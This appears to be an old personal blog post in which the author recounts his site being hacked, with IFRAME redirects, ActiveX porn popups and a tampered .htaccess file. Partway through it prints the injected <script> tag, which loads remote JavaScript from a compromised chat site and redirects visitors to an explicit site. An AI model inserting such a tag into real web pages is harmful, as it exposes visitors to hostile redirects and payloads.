![](\"https:\/\/i0.wp.com\/wastinaway.net\/shortfatguy\/images\/blogbug.gif?resize=65%2C20&ssl=1\")
Coincidental with my having the week off, I’ve been noticing bizarre behavior in regards to my site. Since I’m using a Mac I didn’t encounter anything outright, but my browser was downloading little “2DimensionOfExploitsEnc.php” files. Most often these text files would be blank, but occasionally I’d see some text. Yesterday I discovered an IFRAME was being added to my site, redirecting people to newiframe.biz<\/u><\/b>. Today, I was seeing redirects to a site called Lahrah’s World<\/b>, at elleseebee.com<\/u><\/b>. Wanting to avoid any IFRAME trouble, I removed my Shoutbox and my online poll; but I restored them by the end of the day.<script language=\"JavaScript\" src=\"http:\/\/www.wizardsworldwide.com\/\\nchat\/chat\/localization\/czech\/catalog\/spacer.gif?i\\n=0c2a602a840a150cb337e2406913b775&to=\\nhttp:\/\/www.fucklynx.com\/lynx\/Boobs\/bigtits.html\"><\/script><\/pre> Interestingly, Wizards Worldwide appears to be a Harry Potter chat site. I wonder if the kids who avail themselves of it know it’s apparently a front for Czech hackers.
This was curious, but it still didn’t raise any alarm bells. It wasn’t till I looked at my webpage with a Windows browser that i found cause for alarm. As soon as it loaded in Internet Explorer, I was confronted with an Active X popup window asking me to click “OK” for free porn movies. My site had really been hacked.
There was no way I could allow this upon unsuspecting visitors. It’s one thing to accost them with dreadful content and halfbaked jokes. It’s another to force illegal porn sites on them. I had little idea how to solve the problem — you really should need a license to operate a website — so it seemed simpler to redirect the webpage myself. It was safer to simply steer people away. So, I edited my “.htaccess” file to send all visitors to Google<\/a>. Then, since we’re nearing the end of the campaign trail, I wanted to get some last digs in by pointing to BuzzFlash<\/a>. In the process I discovered someone had been monkeying with the “.htaccess” file. I fixed this and was thus able to restore access to my pMachine control panel — hence this update. It did not solve the problem with that JavaScript code, which, damn it all, is still showing up at the bottom of every page.
I’ll keep investigating. The blog will remain offline. And, in the interests of avoiding any similar problems from other ignorant amateur webmasters, all I can say is use Mozilla<\/a> or get a Mac<\/a>. (Or, perhaps, stay away from Microsoft software, even on<\/i> a Mac<\/a>.)\n","protected":false},"excerpt":{"rendered":"Coincidental with my having the week off, I’ve been noticing bizarre behavior in regards to my site. Since I’m using a Mac I didn’t encounter anything outright, but my browser was downloading little “2DimensionOfExploitsEnc.php” files. Most often these … Continue reading